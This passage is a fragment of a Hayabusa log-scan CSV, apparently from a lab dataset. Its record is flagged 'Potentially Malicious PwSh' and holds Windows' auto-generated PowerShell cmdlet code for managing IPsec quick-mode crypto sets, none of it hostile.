$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if 
($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecQuickModeCryptoSet' -Alias '*' function Set-NetIPsecQuickModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] 
[switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) 
$__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if 
($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecQuickModeCryptoSet' -Alias '*' function Remove-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] 
[string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')]",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx +2021-04-22 19:19:38.660 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if 
($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP 
NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeCryptoSet' -Alias '*' function Rename-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] 
${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName 